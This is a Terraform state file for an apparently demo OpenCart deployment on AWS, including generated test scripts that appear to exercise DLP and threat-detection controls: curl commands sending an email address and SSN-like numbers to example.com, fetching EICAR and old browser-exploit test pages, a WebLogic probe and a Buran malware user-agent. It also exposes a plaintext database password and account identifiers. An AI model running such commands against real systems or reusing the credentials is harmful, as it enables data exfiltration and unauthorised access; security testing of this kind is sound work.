{
  "version": 4,
  "terraform_version": "1.6.5",
  "serial": 144,
  "lineage": "8223c8e8-b5be-8d0e-1efa-028c6f23c80f",
  "outputs": {
    "instance_public_ip": {
      "value": "",
      "type": "string"
    },
    "rds_addrs": {
      "value": "172.31.26.240",
      "type": "string"
    },
    "rds_hostname": {
      "value": "terraform-20240524075846636200000001.cr9rir82q0mh.eu-central-1.rds.amazonaws.com",
      "type": "string"
    }
  },
  "resources": [
    {
      "mode": "data",
      "type": "dns_a_record_set",
      "name": "rds",
      "provider": "provider[\"registry.terraform.io/hashicorp/dns\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "addrs": [
              "172.31.26.240"
            ],
            "host": "terraform-20240524075846636200000001.cr9rir82q0mh.eu-central-1.rds.amazonaws.com",
            "id": "terraform-20240524075846636200000001.cr9rir82q0mh.eu-central-1.rds.amazonaws.com"
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "aws_db_instance",
      "name": "opencart",
      "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
      "instances": [
        {
          "schema_version": 1,
          "attributes": {
            "address": "terraform-20240524075846636200000001.cr9rir82q0mh.eu-central-1.rds.amazonaws.com",
            "allocated_storage": 20,
            "allow_major_version_upgrade": null,
            "apply_immediately": false,
            "arn": "arn:aws:rds:eu-central-1:765228719929:db:terraform-20240524075846636200000001",
            "auto_minor_version_upgrade": true,
            "availability_zone": "eu-central-1a",
            "backup_retention_period": 0,
            "backup_window": "01:59-02:29",
            "ca_cert_identifier": "rds-ca-rsa2048-g1",
            "character_set_name": "",
            "copy_tags_to_snapshot": false,
            "customer_owned_ip_enabled": false,
            "db_subnet_group_name": "default",
            "delete_automated_backups": true,
            "deletion_protection": false,
            "domain": "",
            "domain_iam_role_name": "",
            "enabled_cloudwatch_logs_exports": null,
            "endpoint": "terraform-20240524075846636200000001.cr9rir82q0mh.eu-central-1.rds.amazonaws.com:3306",
            "engine": "mariadb",
            "engine_version": "10.11.6",
            "engine_version_actual": "10.11.6",
            "final_snapshot_identifier": null,
            "hosted_zone_id": "Z1RLNUO7B9Q6NB",
            "iam_database_authentication_enabled": false,
            "id": "terraform-20240524075846636200000001",
            "identifier": "terraform-20240524075846636200000001",
            "identifier_prefix": null,
            "instance_class": "db.m5.large",
            "iops": 0,
            "kms_key_id": "",
            "latest_restorable_time": "0001-01-01T00:00:00Z",
            "license_model": "general-public-license",
            "maintenance_window": "tue:21:50-tue:22:20",
            "max_allocated_storage": 0,
            "monitoring_interval": 0,
            "monitoring_role_arn": "",
            "multi_az": false,
            "name": "opencart",
            "nchar_character_set_name": "",
            "option_group_name": "default:mariadb-10-11",
            "parameter_group_name": "default.mariadb10.11",
            "password": "DusLab123!",
            "performance_insights_enabled": false,
            "performance_insights_kms_key_id": "",
            "performance_insights_retention_period": 0,
            "port": 3306,
            "publicly_accessible": false,
            "replica_mode": "",
            "replicas": [],
            "replicate_source_db": "",
            "resource_id": "db-OWMCYJOSN6T75XZYDFMPCKOPEM",
            "restore_to_point_in_time": [],
            "s3_import": [],
            "security_group_names": null,
            "skip_final_snapshot": true,
            "snapshot_identifier": null,
            "status": "available",
            "storage_encrypted": false,
            "storage_type": "gp2",
            "tags": {
              "Access_group": "RDS_access",
              "Database": "AWS-RDS",
              "Datacenter": "aws",
              "Environment": "demo",
              "Scope": "application",
              "app_name": "opencart",
              "location": "eu-central-1",
              "owner": "dstoeckm"
            },
            "tags_all": {
              "Access_group": "RDS_access",
              "Database": "AWS-RDS",
              "Datacenter": "aws",
              "Environment": "demo",
              "Scope": "application",
              "app_name": "opencart",
              "location": "eu-central-1",
              "owner": "dstoeckm"
            },
            "timeouts": null,
            "timezone": "",
            "username": "my_db_user",
            "vpc_security_group_ids": [
              "sg-0d9faf9cc5c7d6a01"
            ]
          },
          "sensitive_attributes": [],
          "private": "eyJlMmJmYjczMC1lY2FhLTExZTYtOGY4OC0zNDM2M2JjN2M0YzAiOnsiY3JlYXRlIjoyNDAwMDAwMDAwMDAwLCJkZWxldGUiOjM2MDAwMDAwMDAwMDAsInVwZGF0ZSI6NDgwMDAwMDAwMDAwMH0sInNjaGVtYV92ZXJzaW9uIjoiMSJ9"
        }
      ]
    },
    {
      "mode": "managed",
      "type": "aws_instance",
      "name": "web-tier",
      "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
      "instances": [
        {
          "schema_version": 1,
          "attributes": {
            "ami": "ami-030e490c34394591b",
            "arn": "arn:aws:ec2:eu-central-1:765228719929:instance/i-0620ab9d2c34b59af",
            "associate_public_ip_address": false,
            "availability_zone": "eu-central-1c",
            "capacity_reservation_specification": [
              {
                "capacity_reservation_preference": "open",
                "capacity_reservation_target": []
              }
            ],
            "cpu_core_count": 1,
            "cpu_threads_per_core": 1,
            "credit_specification": [
              {
                "cpu_credits": "standard"
              }
            ],
            "disable_api_termination": false,
            "ebs_block_device": [],
            "ebs_optimized": false,
            "enclave_options": [
              {
                "enabled": false
              }
            ],
            "ephemeral_block_device": [],
            "get_password_data": false,
            "hibernation": false,
            "host_id": null,
            "iam_instance_profile": "",
            "id": "i-0620ab9d2c34b59af",
            "instance_initiated_shutdown_behavior": "stop",
            "instance_state": "running",
            "instance_type": "t2.micro",
            "ipv6_address_count": 0,
            "ipv6_addresses": [],
            "key_name": "terraform-mcd-key",
            "launch_template": [],
            "metadata_options": [
              {
                "http_endpoint": "enabled",
                "http_put_response_hop_limit": 1,
                "http_tokens": "optional",
                "instance_metadata_tags": "disabled"
              }
            ],
            "monitoring": false,
            "network_interface": [],
            "outpost_arn": "",
            "password_data": "",
            "placement_group": "",
            "placement_partition_number": null,
            "primary_network_interface_id": "eni-07df099ec4ee6cd52",
            "private_dns": "ip-172-31-7-247.eu-central-1.compute.internal",
            "private_ip": "172.31.7.247",
            "public_dns": "",
            "public_ip": "",
            "root_block_device": [
              {
                "delete_on_termination": true,
                "device_name": "/dev/xvda",
                "encrypted": false,
                "iops": 100,
                "kms_key_id": "",
                "tags": {},
                "throughput": 0,
                "volume_id": "vol-0e4b7a84776fe2a1f",
                "volume_size": 8,
                "volume_type": "gp2"
              }
            ],
            "secondary_private_ips": [],
            "security_groups": [
              "default"
            ],
            "source_dest_check": true,
            "subnet_id": "subnet-0b8e481f37b97d721",
            "tags": {
              "Access_group": "RDS_access",
              "Compliance": "PCI",
              "Name": "opencart-web-front",
              "Scope": "application",
              "Stage": "prod",
              "Tier": "web-tier",
              "app_name": "opencart",
              "owner": "dstoeckm"
            },
            "tags_all": {
              "Access_group": "RDS_access",
              "Compliance": "PCI",
              "Name": "opencart-web-front",
              "Scope": "application",
              "Stage": "prod",
              "Tier": "web-tier",
              "app_name": "opencart",
              "owner": "dstoeckm"
            },
            "tenancy": "default",
            "timeouts": null,
            "user_data": null,
            "user_data_base64": null,
            "volume_tags": null,
            "vpc_security_group_ids": [
              "sg-0d9faf9cc5c7d6a01"
            ]
          },
          "sensitive_attributes": [],
          "private": "eyJlMmJmYjczMC1lY2FhLTExZTYtOGY4OC0zNDM2M2JjN2M0YzAiOnsiY3JlYXRlIjo2MDAwMDAwMDAwMDAsImRlbGV0ZSI6MTIwMDAwMDAwMDAwMCwidXBkYXRlIjo2MDAwMDAwMDAwMDB9LCJzY2hlbWFfdmVyc2lvbiI6IjEifQ=="
        }
      ]
    },
    {
      "mode": "managed",
      "type": "aws_security_group",
      "name": "rds",
      "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
      "instances": [
        {
          "schema_version": 1,
          "attributes": {
            "arn": "arn:aws:ec2:eu-central-1:765228719929:security-group/sg-088aa32900d8e1e7f",
            "description": "Managed by Terraform",
            "egress": [],
            "id": "sg-088aa32900d8e1e7f",
            "ingress": [
              {
                "cidr_blocks": [
                  "172.31.0.0/20"
                ],
                "description": "",
                "from_port": 3306,
                "ipv6_cidr_blocks": [],
                "prefix_list_ids": [],
                "protocol": "tcp",
                "security_groups": [],
                "self": false,
                "to_port": 3306
              }
            ],
            "name": "RDS_access",
            "name_prefix": "",
            "owner_id": "765228719929",
            "revoke_rules_on_delete": false,
            "tags": {
              "Name": "RDS_Access",
              "owner": "dstoeckm"
            },
            "tags_all": {
              "Name": "RDS_Access",
              "owner": "dstoeckm"
            },
            "timeouts": null,
            "vpc_id": "vpc-079c23af1c7563512"
          },
          "sensitive_attributes": [],
          "private": "eyJlMmJmYjczMC1lY2FhLTExZTYtOGY4OC0zNDM2M2JjN2M0YzAiOnsiY3JlYXRlIjo2MDAwMDAwMDAwMDAsImRlbGV0ZSI6OTAwMDAwMDAwMDAwfSwic2NoZW1hX3ZlcnNpb24iOiIxIn0="
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp01",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv https://www.example.com -d \"dstoeckm@cisco.com\" \n",
            "content_base64": null,
            "content_base64sha256": "b1Qec+OjCIv2QPx29dhXAyyghAF+V9aqRgmX9e+tQ2U=",
            "content_base64sha512": "CwC/rwTcPbAh6YmF22aYuvEEihbJRsfHBSJJAZxoWKa9hFqCjYHKKx4XHLspcFbU3m+ZXyX/vT61sy27+qQQ9g==",
            "content_md5": "0bb784de5efda997050dea42889fd76d",
            "content_sha1": "4bc16d459bede02dafa1afc2192ab50a6b46859f",
            "content_sha256": "6f541e73e3a3088bf640fc76f5d857032ca084017e57d6aa460997f5efad4365",
            "content_sha512": "0b00bfaf04dc3db021e98985db6698baf1048a16c946c7c7052249019c6858a6bd845a828d81ca2b1e171cbb297056d4de6f995f25ffbd3eb5b32dbbfaa410f6",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp01.sh",
            "id": "4bc16d459bede02dafa1afc2192ab50a6b46859f",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp02",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv https://www.example.com -d \"dstoeckm@cisco.com, dstoeckm@cisco.com, dstoeckm@cisco.com,dstoeckm@cisco.com, dstoeckm@cisco.com\" \n",
            "content_base64": null,
            "content_base64sha256": "kXNB/C/lOo43sZEqtjyGm1iB8Z9od1+Fsm8w+OVq36Y=",
            "content_base64sha512": "wQ/eeF3/rWbU6TwI0U4has2ht8cO1sF18UVGascpV/TiQ0LChtnbGr1CJs8pVZS2GEVR5NYbDQM5MfK2UedAgQ==",
            "content_md5": "cf66a86d62ff9b5483880ec429a496e0",
            "content_sha1": "6145e313ac05aa7fb281b9b2ead528ce5b708abf",
            "content_sha256": "917341fc2fe53a8e37b1912ab63c869b5881f19f68775f85b26f30f8e56adfa6",
            "content_sha512": "c10fde785dffad66d4e93c08d14e216acda1b7c70ed6c175f145466ac72957f4e24342c286d9db1abd4226cf295594b6184551e4d61b0d033931f2b651e74081",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp02.sh",
            "id": "6145e313ac05aa7fb281b9b2ead528ce5b708abf",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp03",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv https://malware.wicar.org/data/eicar.com \n",
            "content_base64": null,
            "content_base64sha256": "hAOKCxD2X767bMB84t5OxldYauxURdfhsU6qheoW+vA=",
            "content_base64sha512": "rXktnZTexcHkDwB8YZ7BvgI2dKt6IJ81NLyNMJFo5OiEqYM9/I6EiD4OAxQAyArKV8w9x2X8M7iQOhigGeNl/Q==",
            "content_md5": "8d8b3ddefb76b0968db4c680234837c9",
            "content_sha1": "a3e2e04531d48ab94e36c13b76cd9b1bdf841f0b",
            "content_sha256": "84038a0b10f65fbebb6cc07ce2de4ec657586aec5445d7e1b14eaa85ea16faf0",
            "content_sha512": "ad792d9d94dec5c1e40f007c619ec1be023674ab7a209f3534bc8d309168e4e884a9833dfc8e84883e0e031400c80aca57cc3dc765fc33b8903a18a019e365fd",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp03.sh",
            "id": "a3e2e04531d48ab94e36c13b76cd9b1bdf841f0b",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp04",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv https://malware.wicar.org/data/ms03_020_ie_objecttype.html \n",
            "content_base64": null,
            "content_base64sha256": "Hzaz/pwTJEA3kepN9wRm5eszOOKazQsRZBHaUvIzpKo=",
            "content_base64sha512": "bd6JPNyVo3/DE2GZOvFZ+CGKdjldB4pjHbPg6v7bJH1WSa7i4kdYujvQDxjycfD9+FAQbN3Tol8JBnsqay4L3A==",
            "content_md5": "92d784533eedaa1a440d2cb2c8dea033",
            "content_sha1": "6ca149934651bc34cdfe2d970b0ecf6c67ef76df",
            "content_sha256": "1f36b3fe9c1324403791ea4df70466e5eb3338e29acd0b116411da52f233a4aa",
            "content_sha512": "6dde893cdc95a37fc31361993af159f8218a76395d078a631db3e0eafedb247d5649aee2e24758ba3bd00f18f271f0fdf850106cddd3a25f09067b2a6b2e0bdc",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp04.sh",
            "id": "6ca149934651bc34cdfe2d970b0ecf6c67ef76df",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp05",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv https://malware.wicar.org/data/ms14_064_ole_not_xp.html\n",
            "content_base64": null,
            "content_base64sha256": "+yJcte6jKRcAPDCMtIVU7VC7ciRGsSL63+NkETva/o4=",
            "content_base64sha512": "7Fxp7pYRo5AVgYr/quqPY5pjZQQ1LrKvGcoIUYtGWcuNtSjUG4MF/8Csr279GFlceauKeV+f5H47gA8BiAW5aA==",
            "content_md5": "88a0d64edbde03c4a15e869d67ebb7b1",
            "content_sha1": "9e37656c9722fffb3352a4ceb56e8b74827bbd9b",
            "content_sha256": "fb225cb5eea32917003c308cb48554ed50bb722446b122fadfe364113bdafe8e",
            "content_sha512": "ec5c69ee9611a39015818affaaea8f639a636504352eb2af19ca08518b4659cb8db528d41b8305ffc0acaf6efd18595c79ab8a795f9fe47e3b800f018805b968",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp05.sh",
            "id": "9e37656c9722fffb3352a4ceb56e8b74827bbd9b",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp06",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv -d '\u003cmethod' https://www.example.com/wls-wsat/ \n",
            "content_base64": null,
            "content_base64sha256": "PSKDRNKydbAPqgzEA9lqz1LRwi0uOUG1NN6BuYCZ2dI=",
            "content_base64sha512": "jwjD27bftHD3L+zeBMXSiLyNUoMJv0hRd9vDwOKiApPoS4BYpvBnXZGdPnpRxsfbm78equAQtHLZUAkB+Xdg4g==",
            "content_md5": "c58c1c71ba7e4ba996ab3eb3c95f1170",
            "content_sha1": "c060387ec634b4cae63e9e3ad087614d7c351ba5",
            "content_sha256": "3d228344d2b275b00faa0cc403d96acf52d1c22d2e3941b534de81b98099d9d2",
            "content_sha512": "8f08c3dbb6dfb470f72fecde04c5d288bc8d528309bf485177dbc3c0e2a20293e84b8058a6f0675d919d3e7a51c6c7db9bbf1eaae010b472d9500901f97760e2",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp06.sh",
            "id": "c060387ec634b4cae63e9e3ad087614d7c351ba5",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp07",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv \"https://www.example.com/conn.php?data=callback=\"\n",
            "content_base64": null,
            "content_base64sha256": "iUu1JvHQGaw/x0Uz6jb0vbpN/1wCpUrQSCdihc8f2xQ=",
            "content_base64sha512": "OQFbhAMrvynpxzeW8lKWNNBhnePL6hrR5NFVq71ARoGmR6/V/VEtjYLHBNHG5I42p9qduu6fUZ8BL6D0ZdbLew==",
            "content_md5": "4653fbb51f3de9bc737e4ed62b793ba7",
            "content_sha1": "bd06aefb6568284aa849e74e1d1be45a2811a80d",
            "content_sha256": "894bb526f1d019ac3fc74533ea36f4bdba4dff5c02a54ad048276285cf1fdb14",
            "content_sha512": "39015b84032bbf29e9c73796f2529634d0619de3cbea1ad1e4d155abbd404681a647afd5fd512d8d82c704d1c6e48e36a7da9dbaee9f519f012fa0f465d6cb7b",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp07.sh",
            "id": "bd06aefb6568284aa849e74e1d1be45a2811a80d",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp08",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv -H \"User-Agent: Buran\" https://www.example.com/ \n",
            "content_base64": null,
            "content_base64sha256": "SJGtmAwUmR61yd4g1qjl/cwGPhlInYnfD8eWEeeCOjI=",
            "content_base64sha512": "732295/g/Nd6WeT8UDG0eOrh1B/HUtj1lqGurv70IF1dkRhYg+iJbJkXLcHgl91k+qTlry/O3cYc1mfWWx4TRA==",
            "content_md5": "fe722d512e1013ebc4792213305e3a10",
            "content_sha1": "8602dd529cd79706825da4389ecc64447d352274",
            "content_sha256": "4891ad980c14991eb5c9de20d6a8e5fdcc063e19489d89df0fc79611e7823a32",
            "content_sha512": "ef7db6f79fe0fcd77a59e4fc5031b478eae1d41fc752d8f596a1aeaefef4205d5d91185883e8896c99172dc1e097dd64faa4e5af2fceddc61cd667d65b1e1344",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp08.sh",
            "id": "8602dd529cd79706825da4389ecc64447d352274",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "dlp09",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "curl -kv https://www.example.com -d \"604-29-7632 604-29-7632 604-29-7632 604-29-7632 604-29-7632 604-29-7632 604-29-7632\"\n",
            "content_base64": null,
            "content_base64sha256": "4MchgenDVNBIMLl5cr/S0z6WG0Bq+JI1H4A2rv712S4=",
            "content_base64sha512": "6MCpUzAIJJm6riUerkIMguI/qpnaw6E6mRKweO3uEvwTTLy3Y8j2Xx8U1+HO4rsRk6mJKdecn4A25axKt0Q3iA==",
            "content_md5": "24d4bd4768a227c216b99ea1b8df8325",
            "content_sha1": "e1d23ef3e2dcc22d532cb07abfb69811814f9291",
            "content_sha256": "e0c72181e9c354d04830b97972bfd2d33e961b406af892351f8036aefef5d92e",
            "content_sha512": "e8c0a95330082499baae251eae420c82e23faa99dac3a13a9912b078edee12fc134cbcb763c8f65f1f14d7e1cee2bb1193a98929d79c9f8036e5ac4ab7443788",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "roles/opencart-aws/files/dlp09.sh",
            "id": "e1d23ef3e2dcc22d532cb07abfb69811814f9291",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "tf_ansible_vars_file_new",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "# Ansible vars_file containing variable values from Terraform.\n# Generated by Terraform mgmt configuration.\nWeb_Server: ciscomcd-l-ingrirsimxhx-48d6ad38b3e4e8c2.elb.eu-central-1.amazonaws.com\nSQL_Server: terraform-20240524075846636200000001.cr9rir82q0mh.eu-central-1.rds.amazonaws.com \n",
            "content_base64": null,
            "content_base64sha256": "B5+92thjY6H48xjDgKwHiaySMz2IzUq6RmpOQ2+goLk=",
            "content_base64sha512": "snml7rowNXWyK84al2rFyM7sCKpKTmu5RIHCdrjamMN/fJYNtQSZHlb/pxVYh4VfMTNfQS+Q1r6DqTxX3X4ORw==",
            "content_md5": "142ce5bff335170355db338680e96674",
            "content_sha1": "fec3a298554dbc1c474449cc47934ae9c1b5d14d",
            "content_sha256": "079fbddad86363a1f8f318c380ac0789ac92333d88cd4aba466a4e436fa0a0b9",
            "content_sha512": "b279a5eeba303575b22bce1a976ac5c8ceec08aa4a4e6bb94481c276b8da98c37f7c960db504991e56ffa7155887855f31335f412f90d6be83a93c57dd7e0e47",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "group_vars/tf_ansible_vars_file.yml",
            "id": "fec3a298554dbc1c474449cc47934ae9c1b5d14d",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": [],
          "dependencies": [
            "aws_db_instance.opencart"
          ]
        }
      ]
    },
    {
      "mode": "managed",
      "type": "local_file",
      "name": "tf_inventory",
      "provider": "provider[\"registry.terraform.io/hashicorp/local\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "content": "# Ansible inventory containing variable values from Terraform.\n# Generated by Terraform mgmt configuration.\n[dashboard]\nciscomcd-l-ingrirsimxhx-48d6ad38b3e4e8c2.elb.eu-central-1.amazonaws.com\n[dashboard:vars]\nansible_ssh_private_key_file=/Users/dstoeckm/.ssh/terraform-mcd-key.pem\n\n",
            "content_base64": null,
            "content_base64sha256": "XepGPsTyVKwYynCe5l5GgelttC1GJmNFriRdXIMjC1Q=",
            "content_base64sha512": "0XcIprdH6DKRUwxTp/8JbcfJNb7IeLCpoYSsUGYve1DptETGUO7U5Ey1IrzzfiDBHtuJqQr0MrnJeAvd4PBlgQ==",
            "content_md5": "52450928ce0feb4a971d458c794731fa",
            "content_sha1": "6a8ae75e9c3af3c77faaf4cba5ee3169b3f7ea4c",
            "content_sha256": "5dea463ec4f254ac18ca709ee65e4681e96db42d46266345ae245d5c83230b54",
            "content_sha512": "d17708a6b747e83291530c53a7ff096dc7c935bec878b0a9a184ac50662f7b50e9b444c650eed4e44cb522bcf37e20c11edb89a90af432b9c9780bdde0f06581",
            "directory_permission": "0777",
            "file_permission": "0777",
            "filename": "group_vars/tf_inventory",
            "id": "6a8ae75e9c3af3c77faaf4cba5ee3169b3f7ea4c",
            "sensitive_content": null,
            "source": null
          },
          "sensitive_attributes": []
        }
      ]
    },
    {
      "mode": "managed",
      "type": "null_resource",
      "name": "ansible_deployment",
      "provider": "provider[\"registry.terraform.io/hashicorp/null\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "id": "3664261496690901177",
            "triggers": null
          },
          "sensitive_attributes": [],
          "dependencies": [
            "aws_db_instance.opencart",
            "aws_instance.web-tier",
            "local_file.tf_ansible_vars_file_new"
          ]
        }
      ]
    },
    {
      "mode": "managed",
      "type": "tetration_tag",
      "name": "tag01",
      "provider": "provider[\"registry.terraform.io/ciscodevnet/tetration\"]",
      "instances": [
        {
          "schema_version": 1,
          "attributes": {
            "attributes": {
              "Access_group": "RDS_access",
              "Database": "AWS-RDS",
              "Datacenter": "aws",
              "Scope": "application",
              "Stage": "prod",
              "VPC-ID": "vpc-079c23af1c7563512",
              "app_name": "opencart",
              "location": "eu-central-1"
            },
            "id": "dstoeckm:172.31.26.240",
            "ip": "172.31.26.240",
            "tenant_name": "dstoeckm"
          },
          "sensitive_attributes": [],
          "private": "eyJzY2hlbWFfdmVyc2lvbiI6IjEifQ==",
          "dependencies": [
            "aws_db_instance.opencart",
            "data.dns_a_record_set.rds"
          ]
        }
      ]
    },
    {
      "mode": "managed",
      "type": "tetration_tag",
      "name": "tag02",
      "provider": "provider[\"registry.terraform.io/ciscodevnet/tetration\"]",
      "instances": [
        {
          "schema_version": 1,
          "attributes": {
            "attributes": {
              "Datacenter": "aws",
              "VPC-ID": "vpc-079c23af1c7563512",
              "app_name": "opencart",
              "location": "eu-central-1",
              "tgw-ID": "eni-017d25c72fb8d68c7"
            },
            "id": "dstoeckm:172.31.31.174",
            "ip": "172.31.31.174",
            "tenant_name": "dstoeckm"
          },
          "sensitive_attributes": [],
          "private": "eyJzY2hlbWFfdmVyc2lvbiI6IjEifQ=="
        }
      ]
    }
  ],
  "check_results": null
}
